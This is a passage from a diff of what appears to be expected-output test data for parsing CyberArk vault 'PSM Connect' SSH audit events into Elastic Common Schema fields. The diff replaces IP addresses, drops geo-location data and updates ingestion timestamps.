System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 03:35:00", "desc": "PSM Connect" @@ -1464,8 +1300,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936292900Z", - "original": "\u003c5\u003e1 2021-03-15T10:35:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:00\",\"IsoTimestamp\":\"2021-03-15T10:35:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331193100Z", + "original": "\u003c5\u003e1 2021-03-15T10:35:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:00\",\"IsoTimestamp\":\"2021-03-15T10:35:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1488,39 +1324,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1537,7 +1352,7 @@ }, "@timestamp": "2021-03-15T13:18:31.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -1548,16 +1363,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T13:18:31Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1569,21 +1383,21 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "692fe25f-f940-4170-8ea4-5241b35173f0", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 06:18:31", "desc": "PSM Connect" @@ -1594,8 +1408,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936295400Z", - "original": "\u003c5\u003e1 2021-03-15T13:18:31Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:31\",\"IsoTimestamp\":\"2021-03-15T13:18:31Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331199Z", + "original": "\u003c5\u003e1 2021-03-15T13:18:31Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:31\",\"IsoTimestamp\":\"2021-03-15T13:18:31Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1618,39 +1432,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1667,7 +1460,7 @@ }, "@timestamp": "2021-03-15T14:08:06.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -1678,16 +1471,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:06Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM 